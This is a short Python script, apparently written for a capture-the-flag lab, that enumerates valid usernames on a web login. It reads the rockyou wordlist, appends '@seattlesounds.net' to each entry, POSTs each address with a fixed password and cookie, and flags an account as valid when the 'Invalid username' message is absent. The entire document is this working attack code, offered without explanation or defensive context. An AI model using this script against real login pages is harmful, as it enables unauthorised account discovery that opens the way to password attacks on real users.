################################################################# #Objective: # Brute-force for login enumeration #Description: # POST request to try to log on the application #Date: # 16/03/2017 ################################################################# import requests #wordfile to use wordfile = "/root/ctf/wordlist/rockyou.txt" wd = open(wordfile) #content return when username error match='Invalid username, please try again.' #credentials #entry = 'admin@seattlesounds.net' #entry = entry.rstrip("\n") mail = '@seattlesounds.net' password = 'random' #target URL url = "" #to know how much username has already been tested i=0 for entry in wd: entry = entry.rstrip("\n") entry = entry + mail #data to be include when requesting datas = {'password':password,'usermail':entry} #cookie to be include when requesting cookie = {'level':'1'} request = requests.post(url, data = datas, cookies = cookie).text if match not in request: print(entry,': login correct') i=i+1 if i%1000==0: print('Line',i)